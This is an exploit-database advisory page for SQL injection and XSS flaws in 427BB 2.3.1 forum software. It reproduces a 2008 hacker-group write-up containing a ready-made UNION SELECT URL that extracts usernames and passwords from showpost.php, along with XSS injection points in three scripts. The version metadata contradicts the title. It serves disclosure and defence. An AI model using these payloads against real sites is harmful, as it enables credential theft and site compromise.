427BB 2.3.1 (SQL/XSS) Multiple Remote Vulnerabilities

vendor:

427BB

by:

CWH Underground

8.8

CVSS

HIGH

SQL Injection and XSS

89 (SQL Injection) and 79 (XSS)

CWE

Product Name: 427BB

Affected Version From: 2.3.2001

Affected Version To: 2.3.2001

Patch Exists: NO

Related CWE: N/A

CPE: 427bb:427bb:2.3.1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

427BB 2.3.1 (SQL/XSS) Multiple Remote Vulnerabilities

A SQL injection vulnerability exists in showpost.php due to improper sanitization of user-supplied input. An attacker can exploit this vulnerability to execute arbitrary SQL commands in the application's database. Multiple XSS vulnerabilities exist in register.php, reminder.php, and search.php due to improper sanitization of user-supplied input. An attacker can exploit these vulnerabilities to inject arbitrary HTML and script code into the application's web pages.

Mitigation:

Input validation should be used to prevent SQL injection and XSS attacks. All user-supplied input should be validated and filtered before being used in SQL queries or HTML output.

Source

Exploit-DB raw data:

============================================================
 427BB 2.3.1 (SQL/XSS) Multiple Remote Vulnerabilities
============================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'

AUTHOR : CWH Underground
DATE   : 4 June 2008
SITE   : www.citec.us


#####################################################
 APPLICATION : 427BB
 VERSION     : 2.3.1
 DOWNLOAD    : http://fourtwosevenbb.sourceforge.net/
#####################################################

---SQL Injection Exploit [showpost.php]---

##############################################
Vulnerable: showpost.php

118: $sql = "SELECT ID, UserName, Post, UTime, IP, InReplyTo, ThreadID From " . $t_prefix . "Posts WHERE ID=$post_id";
119:
120: $res = mysql_query($sql);

###############################################

Exploit:

http://[target]/[path]/showpost.php?ForumID=1&post=1 union select 1,UserName,3,4,5,Password,7 FROM 427bb_personal WHERE ID=1--



---Multiple Remote XSS Exploit---

###########
XSS in URI
###########

Example:
     
http://[target]/[path]/register.php/<XSS>
http://[target]/[path]/reminder.php/<XSS>
http://[target]/[path]/search.php/<XSS>

####################
XSS with POST Method
####################

Example:

http://[target]/[path]/register.php
[-]POST variable "uname"
[-]POST variable "email"
[-]POST variable "email2"

http://[target]/[path]/reminder.php
[-]POST variable "email"

http://[target]/[path]/search.php
[-]POST variable "keywords"

##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################

# milw0rm.com [2008-06-05]